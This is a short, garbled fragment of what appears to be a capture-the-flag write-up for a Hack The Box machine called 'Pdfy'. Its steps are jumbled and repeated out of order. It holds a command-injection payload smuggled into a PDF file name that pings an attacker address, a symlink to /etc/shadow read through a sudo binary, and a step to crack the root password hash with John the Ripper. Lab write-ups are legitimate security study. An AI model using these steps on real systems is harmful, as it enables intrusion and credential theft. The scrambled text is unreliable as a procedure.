Pdfy Htb Writeup -
Crack root hash with John the Ripper:
sudo /usr/local/bin/pdfy Enter shadow.pdf → outputs /etc/shadow as text. Pdfy Htb Writeup
ln -s /etc/shadow shadow.pdf Run:
mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to: Crack root hash with John the Ripper: sudo